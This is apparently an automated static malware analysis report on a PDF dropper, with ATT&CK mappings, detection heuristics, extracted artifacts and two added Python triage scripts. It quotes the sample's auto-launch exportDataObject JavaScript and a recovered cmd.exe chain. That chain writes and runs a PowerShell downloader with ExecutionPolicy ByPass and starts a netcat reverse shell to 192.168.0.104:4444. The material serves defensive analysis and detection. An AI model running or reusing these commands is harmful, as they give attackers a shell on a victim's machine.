Malicious PDF — malware analysis report

Static analysis result for SHA-256 1ddc197429d4cc6a…

Verdict: MALICIOUS
File type: PDF
Size: 458.3 KB
Authoring application: PyPDF2
First seen: 2026-06-05
MD5: b0723bc54726f2ad11c1d76c1ab29fbb
SHA-1: 46cc5ac08ed8269fd13e853815d054bae615c0d5
SHA-256: 1ddc197429d4cc6afd688c9eb56dc36817239bb2f0f426f0f9a688560b3a74ff
Risk score: 272

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The document carries JavaScript that runs when it is opened and calls `exportDataObject({ cName: "page.html", nLaunch: 2 })`. `nLaunch` is a parameter of `exportDataObject`, not a separate function: with a value of 2 the embedded file attachment `page.html` is saved to a temporary location and opened in its default application without prompting the user. The attachment is not a web page. It is 384,474 bytes and, 0x20A bytes into it, contains a long Base64 blob that decodes to a 287,921-byte Windows PE executable (see Extracted artifacts); the engine also found an HTML `<script>` tag in a PDF stream, consistent with `page.html` being an HTML wrapper that carries the encoded PE. Naming the attachment `.html` rather than `.exe` is consistent with sidestepping Acrobat's attachment-extension blocklist, which refuses to launch executables; how the PE is actually reached once the system's default `.html` handler opens the file is something a sandbox run should confirm. The URL `http://aa.ogepscmaa/isjur/../qeymnj`, labelled as referenced from PDF JavaScript, has a hostname whose last label is not a delegated TLD and a path-traversal segment, and is most likely related to payload delivery or C2. Strings recovered from the carved PE add `https://tinyurl.com/y88r9epk` (also present in the document text) and a command chain that writes a PowerShell script to `c:\temp\b.ps1`, runs it with `-ExecutionPolicy ByPass`, and starts `c:\temp\a.exe` as a reverse shell to 192.168.0.104:4444.

Machine Learning

  • Nyx PDF Classifier malicious score 0.7380

Heuristics (10)

  • Base64-encoded Windows executable payload in PDF [critical] PDF_BASE64_PE_PAYLOAD
    PDF text contains a long base64 blob that decodes to a verified Windows PE executable. This catches payloads hidden after EOF, inside comments, or in plain text outside normal PDF streams.
  • Suspicious extracted artifact [critical] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action [low, 2 related findings] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch, embedded-file launch-on-open dropper [critical] PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream [medium] PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. This is common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file [low] PDF_EMBEDDED
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • External URI [low] PDF_URI
    PDF contains an external URL action.
  • Visual download / call-to-action button lure [low] SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.). Low-signal unless other findings point to a malicious workflow.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js (referenced by PDF JavaScript)
    • http://aa.ogepscmaa/isjur/../qeymnj (referenced by PDF JavaScript)
    • http://www.ascendercorp.com/ (in PDF document text)
    • http://www.ascendercorp.com/typedesigners.html (in PDF document text)
    • http://www.monotype.com (in PDF document text)
    • https://get.adobe.com/flashplayer/ (referenced by PDF JavaScript)
    • https://wwwimages2.adobe.com/www.adobe.com/content/dam/acom/en/legal/licenses-terms/pdf/PlatformClients_PC_WWEULA-en_US-20150407_1357.pdf (PDF link annotation)
    • https://tinyurl.com/y88r9epk (in PDF document text; the same link is recovered from the carved PE's strings, see Extracted artifacts)
    • http://typekit.com/eulas/000000000000000000014f51 (in PDF document text)
    • https://fedoraproject.org/wiki/Licensing/LiberationFontLicense (in PDF document text)
    • http://typekit.com/eulas/000000000000000000014f4f (in PDF document text)
    • http://www.monotype.com/html/mtname/ms_arial.html (in PDF document text)
    • http://www.monotype.com/html/mtname/ms_welcome.html (in PDF document text)
    • http://www.monotype.com/html/type/license.html (in PDF document text)
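The two critical heuristics above, PDF_BASE64_PE_PAYLOAD and PDF_JS_EXPORT_LAUNCH_DROPPER, reimplemented as a stand-alone triage script. This is an added example, not code from the report's engine or from the sample: the object/stream parsing is deliberately minimal (no xref, direct /Length only, Flate only), the 256-character base64 threshold is an assumption, and the document it runs on is constructed inline to mirror the sample's shape (a Flate-compressed /JS stream reached from the catalog's OpenAction, plus a base64 PE stub after %%EOF).

```python
import base64
import re
import struct
import zlib

# Minimal object model: "<num> 0 obj ... endobj", a stream header "<< ... >> stream",
# and a direct /Length (indirect lengths such as "/Length 5 0 R" are skipped here).
OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
STREAM_HDR_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n", re.S)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")
JS_LITERAL_RE = re.compile(rb"/JS\s*\((.*?)\)\s*>>", re.S)   # /JS (literal string)
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+0\s+R")               # /JS <num> 0 R (stream)
# exportDataObject(...) with nLaunch in the same call: the launch-on-open dropper rule.
LAUNCH_RE = re.compile(rb"exportDataObject\s*\(.*?nLaunch\s*:\s*(\d)", re.S)
# A long base64 run anywhere in the file, including after %%EOF; 256 is an assumed floor.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def is_pe(data: bytes) -> bool:
    """True if data has a DOS header whose e_lfanew points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def js_sources(pdf: bytes):
    """Yield (file_offset, javascript_bytes) for /JS literal strings and /JS stream refs."""
    streams = {}
    for obj in OBJ_RE.finditer(pdf):
        body = obj.group(2)
        hdr = STREAM_HDR_RE.search(body)
        length = LENGTH_RE.search(hdr.group(1)) if hdr else None
        if not length:                      # not a stream, or indirect /Length
            continue
        data = body[hdr.end():hdr.end() + int(length.group(1))]
        if b"/FlateDecode" in hdr.group(1):
            try:
                data = zlib.decompress(data)
            except zlib.error:
                continue
        streams[obj.group(1)] = (obj.start(), data)
    for m in JS_LITERAL_RE.finditer(pdf):
        yield m.start(), m.group(1)
    for m in JS_REF_RE.finditer(pdf):
        if m.group(1) in streams:
            yield streams[m.group(1)]


def find_launch_droppers(pdf: bytes) -> list:
    """exportDataObject calls whose nLaunch >= 1, i.e. the attachment is saved and launched."""
    hits = []
    for offset, js in js_sources(pdf):
        for m in LAUNCH_RE.finditer(js):
            n = int(m.group(1))
            if n >= 1:
                hits.append({"offset": offset, "nLaunch": n})
    return hits


def find_base64_pe(pdf: bytes) -> list:
    """Base64 runs that decode to a verified PE image, with file offset and decoded size."""
    hits = []
    for m in B64_RE.finditer(pdf):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        if is_pe(decoded):
            hits.append({"offset": m.start(), "size": len(decoded)})
    return hits


def build_sample() -> bytes:
    """Constructed test document (not the analysed sample): OpenAction -> Flate /JS stream,
    plus a 268-byte PE stub (DOS header, e_lfanew=0x40, PE signature) base64-encoded after %%EOF."""
    pe = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 200
    js = b'this.exportDataObject({ cName: "page.html", nLaunch: 2 });'
    js_z = zlib.compress(js)
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
            b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(js_z)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + js_z + b"\nendstream endobj\n"
            b"%%EOF\n" + base64.b64encode(pe) + b"\n")


if __name__ == "__main__":
    doc = build_sample()
    print("launch droppers:", find_launch_droppers(doc))
    print("base64 PE blobs:", find_base64_pe(doc))
```

The PE check deliberately requires both the `MZ` header and a valid `e_lfanew` to `PE\0\0`, so random base64 text (fonts, images, certificates) does not fire; on a real sample, feed it the raw file bytes and, for attachments, also run `find_base64_pe` over each carved EmbeddedFile, since here the blob lives inside `page.html` rather than in the PDF body.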

Extracted artifacts (9)

Files carved from inside the sample during analysis. Each record gives the filename, kind, source, size and SHA-256.
page.html
  Kind: pdf-embedded-file
  Source: PDF EmbeddedFile object 46 at offset 0x1473A
  Size: 384474 bytes
  SHA-256: f84ea2d50dd9b36852d2abaa31d40b0440d80649b488c70dafe74d79e4c70113
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)
javascript_obj0004_000.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 4 at offset 0x9C7
  Size: 58 bytes
  SHA-256: 264b30b19988d0d66012af09cd2442e808d747d3fb6c4de44b81438b9bac75e3
  Preview (first 1,000 lines of the extracted script):
    this.exportDataObject({ cName: "page.html", nLaunch: 2 });
javascript_obj0004_001.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 4 at offset 0x9C7 (second carving of the same stream, 2 bytes shorter: it stops before the closing `);`)
  Size: 56 bytes
  SHA-256: 7138f87bffcf0462164747b9bc1008c764542af7db17de522dde7b23c4bae8f7
  Preview (first 1,000 lines of the extracted script):
    this.exportDataObject({ cName: "page.html", nLaunch: 2 }
base64_pdf_pe_00014944.exe
  Kind: embedded-pe
  Source: PDF raw base64 PE payload at offset 0x14944 (0x20A bytes into the page.html attachment)
  Size: 287921 bytes
  SHA-256: 886356a3e5fbc14383c1832ab0691aff98951fd37f2451810e137ab3a65c21e3
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely
  Type: actual_type=PE; declared_or_context_type=PDF
  Static shellcode analysis recovered URL(s): https://tinyurl.com/y88r9epk
  Static shellcode analysis recovered command string(s) (the first two are truncated as recovered):
    cmd.exe /c mkdir c:\temp 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\temp\b.ps1 & echo (wget 'https://tinyu
    cmd.exe /c powershell -Execut
    cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\temp\b.ps1 & START /MIN c:\temp\a.exe 192.168.0.104 4444 -e cmd.exe -d & exit
  Analyst note: read together, the chain (1) creates c:\temp and writes a PowerShell script b.ps1 that forces TLS 1.2 and, per the truncated `wget` line, downloads from the tinyurl.com link above; (2) runs it with `-ExecutionPolicy ByPass`; and (3) starts c:\temp\a.exe with `192.168.0.104 4444 -e cmd.exe -d`, which is the argument form of a Windows netcat reverse shell (connect to host:port, attach cmd.exe, detach from the console). The carets are cmd.exe escapes, so the text actually written to b.ps1 is `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12`. 192.168.0.104 is an RFC 1918 address, so this build can only call back on a local network, which suggests a test or lab build rather than internet-facing C2. ClamAV is clean on both the attachment and the carved PE; do not rely on AV for this sample.
combined_document_js_000.js
  Kind: deobfuscated-js
  Source: combined document JavaScript streams at offset 0x9C7
  Size: 115 bytes
  SHA-256: 4585fe1d8b50d37587f6a44a0c0fcedebafab044930973664af49854a3626369
  Preview (first 1,000 lines of the extracted script):
    this.exportDataObject({ cName: "page.html", nLaunch: 2 });
    this.exportDataObject({ cName: "page.html", nLaunch: 2 }
font_00_sfnt_off000093e4.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x93E4
  Size: 8344 bytes
  SHA-256: 26f4a541ae01668596e6f0ecab6a4ec5af8e0430c526dd47363b686183eb1a36
font_01_sfnt_off0000aaff.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0xAAFF
  Size: 21532 bytes
  SHA-256: 5091de8b5a8651ee3354927cb3e58ac938a47a05778b1c5b3dcda2384521acca
font_02_sfnt_off0000e440.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0xE440
  Size: 13036 bytes
  SHA-256: 63cf60a9e10bbfe3933cc8f3af44b00485e40612cfca4f232e82d5bbf3cb122d
font_03_sfnt_off00010568.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x10568
  Size: 34336 bytes
  SHA-256: 434eb42b71a8798cb4ba10d418932446b08869be155f9587626055d9cb3de354
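The command strings recovered from the base64_pdf_pe_00014944.exe artifact, parsed into indicators by an added example script. This is not the report engine's code nor anything from the sample: it splits the cmd.exe chain on unescaped `&`, removes the caret escapes so each stage reads as cmd.exe would pass it on, and pulls out the file written by `echo ... > path` (with its decoded content), the PowerShell execution-policy bypass, and the netcat-style `<host> <port> -e <shell>` reverse-shell arguments, flagging private callback addresses. The regexes are assumptions that cover this chain rather than every cmd.exe idiom; the inputs are the report's own recovered strings, with the first kept truncated exactly as recovered and the short `cmd.exe /c powershell -Execut` fragment omitted.

```python
import ipaddress
import re

# Command strings as recovered from the carved PE; the first is truncated in the report
# and stays truncated here (no attempt is made to complete the cut-off wget line).
RECOVERED = [
    r"cmd.exe /c mkdir c:\temp 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= "
    r"^[Net.SecurityProtocolType^]::Tls12 > c:\temp\b.ps1 & echo (wget 'https://tinyu",
    r"cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\temp\b.ps1 "
    r"& START /MIN c:\temp\a.exe 192.168.0.104 4444 -e cmd.exe -d & exit",
]

# Assumed patterns for this example (not a general cmd.exe grammar).
WRITE_RE = re.compile(r"^echo\s+(.*?)\s*>\s*([A-Za-z]:\\\S+)$")          # echo <content> > <path>
PS_RE = re.compile(r"powershell\b.*?-Exec\w*\s+(\S+).*?-File\s+(\S+)", re.I)
REVSHELL_RE = re.compile(                                                 # <bin>.exe <ip> <port> -e <shell>
    r"(\S+\.exe)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\s+-e\s+(\S+)", re.I)


def split_chain(cmdline: str) -> list:
    """Split on unescaped '&' (cmd.exe's command separator) and drop caret escapes,
    so each stage is the text cmd.exe actually hands to the next program."""
    stages, buf, i = [], [], 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "^" and i + 1 < len(cmdline):   # ^X escapes X for cmd.exe
            buf.append(cmdline[i + 1])
            i += 2
        elif ch == "&":
            stages.append("".join(buf).strip())
            buf = []
            i += 1
        else:
            buf.append(ch)
            i += 1
    stages.append("".join(buf).strip())
    return [s for s in stages if s]


def triage_chain(cmdline: str) -> dict:
    """Return dropped files, PowerShell invocations and reverse-shell parameters found in the chain."""
    out = {"stages": split_chain(cmdline), "writes": [], "powershell": [], "reverse_shell": []}
    for stage in out["stages"]:
        if (m := WRITE_RE.search(stage)):
            out["writes"].append({"path": m.group(2), "content": m.group(1)})
        if (m := PS_RE.search(stage)):
            out["powershell"].append({"policy": m.group(1), "script": m.group(2)})
        if (m := REVSHELL_RE.search(stage)):
            ip = ipaddress.ip_address(m.group(2))
            out["reverse_shell"].append({
                "binary": m.group(1), "host": str(ip), "port": int(m.group(3)),
                "shell": m.group(4), "private_address": ip.is_private,
            })
    return out


if __name__ == "__main__":
    for cmd in RECOVERED:
        for key, value in triage_chain(cmd).items():
            print(f"{key}: {value}")
        print()
```

Splitting on unescaped `&` only (not `&&` or `||`) is enough for this chain; the decoded `content` of the write is what to hunt for in `c:\temp\b.ps1` on a host, and the `private_address` flag is what tells you the callback would never have left the sample's lab network.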